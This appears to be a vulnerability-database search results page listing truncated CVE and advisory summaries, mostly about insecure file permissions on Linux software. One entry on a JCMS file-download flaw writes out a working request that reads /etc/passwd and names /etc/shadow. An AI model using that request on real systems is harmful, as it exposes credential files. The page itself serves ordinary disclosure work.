16 matches found
CVE-2026-50267
Steeltoe is an open source project that provides a collection of libraries that help users build cloud-native applications. In Steeltoe.Configuration.Abstractions 4.0.0 through 4.1.0, when MySQL or PostgreSQL service bindings from VCAP_SERVICES include TLS client credentials, the Connectors libra...
EUVD-2004-1772
Malware in sbrugna...
EUVD-1999-1149
Malware in sbrugna...
EUVD-2004-0586
Malware in sbrugna...
EUVD-2007-6560
Malware in sbrugna...
Palo Alto Networks GlobalProtect Security Vulnerability
Palo Alto Networks GlobalProtect is a suite of network protection software from Palo Alto Networks, USA. The software provides features such as firewall monitoring and threat prevention. A security vulnerability exists in Palo Alto Networks GlobalProtect, which stems from an improper assignment o...
CVE-2024-13188
A vulnerability was found in MicroWorld eScan Antivirus 7.0.32 on Linux. It has been rated as critical. Affected by this issue is some unknown functionality of the file /opt/MicroWorld/var/ of the component Installation Handler. The manipulation leads to incorrect default permissions. The attack...
CVE-2025-32915 Sensitive data exposed during automatic agent updates
Packages downloaded by Checkmk's automatic agent updates on Linux and Solaris have incorrect permissions in Checkmk 2.4.0p1, 2.3.0p32, 2.2.0p42 and = 2.1.0p49 EOL. This allows a local attacker to read sensitive data...
Security fix for the ALT Linux 10 package thunderbird version 91.0-alt1
Aug. 12, 2021 Andrey Cherepanov 91.0-alt1 - New version. - Security fixes: + CVE-2021-29986 Race condition when resolving DNS names could have led to memory corruption + CVE-2021-29981 Live range splitting could have led to conflicting assignments in the JIT + CVE-2021-29988 Memory corruption as ...
CVE-2020-1998
An improper authorization vulnerability in PAN-OS that mistakenly uses the permissions of local Linux users instead of the intended SAML permissions of the account when the username is shared for the purposes of SSO authentication. This can result in authentication bypass and unintended resource...
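大汉网络 JCMS module/voting/down.jsp arbitrary file download
Permissions are not set properly, which makes it possible to enumerate file names and download files /jcms/m5e/module/voting/down.jsp?filename=username&pathfile=/etc/passwd For pathfile, just enter paths as they are on your own Linux system; a few were tested here /etc/shadow /etc/shadow...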
Design/Logic Flaw
wexport.c in XWine 1.0.1 on Debian GNU/Linux sets insecure permissions 0666 for /etc/wine/config, which might allow local users to execute arbitrary commands or cause a denial of service by modifying the file...
DEBIAN-CVE-2007-5028
Dibbler 0.6.0 on Linux uses weak world-writable permissions for unspecified files in /var/lib/dibbler, which has unknown impact and local attack vectors...
[Full-Disclosure] iDEFENSE Security Advisory 05.12.04: Opera Telnet URI Handler File Creation/Truncation Vulnerability
Opera Telnet URI Handler File Creation/Truncation Vulnerability iDEFENSE Security Advisory 05.12.04 www.idefense.com/application/poi/display?id=104&type=vulnerabilities May 12, 2004 I. BACKGROUND Opera is a cross-platform web browser. More information is available from http://www.opera.com/ II...
CVE-2000-0145
The libguile.so library file used by gnucash in Debian GNU/Linux is installed with world-writable permissions...
CVE-1999-0426
The default permissions of /dev/kmem in Linux versions before 2.0.36 allow IP spoofing...